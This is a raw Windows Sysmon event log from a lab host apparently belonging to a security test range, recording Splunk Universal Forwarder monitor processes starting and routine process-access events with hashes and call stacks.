154100x800000000000000018939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-95BA-6005-6705-00000000A301}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.998{59A5CD1D-95BA-6005-6805-00000000A301}61044472C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.911{59A5CD1D-95BC-6005-6A05-00000000A301}43006988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95BC-6005-6A05-00000000A301}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:48.755{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:48.755{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-95BC-6005-6A05-00000000A301}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95BC-6005-6A05-00000000A301}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.755{59A5CD1D-95BC-6005-6A05-00000000A301}4300C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.239{59A5CD1D-95BC-6005-6905-00000000A301}6036824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.087{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95BC-6005-6905-00000000A301}6036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.085{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:48.085{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.084{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:48.084{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.084{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-95BC-6005-6905-00000000A301}6036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.084{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95BC-6005-6905-00000000A301}6036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:48.084{59A5CD1D-95BC-6005-6905-00000000A301}6036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.494{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95BD-6005-6B05-00000000A301}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:49.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:49.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.492{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-95BD-6005-6B05-00000000A301}6268C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.491{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95BD-6005-6B05-00000000A301}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:49.491{59A5CD1D-95BD-6005-6B05-00000000A301}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:57.614{59A5CD1D-8E46-6005-0D00-00000000A301}6284804C:\Windows\system32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 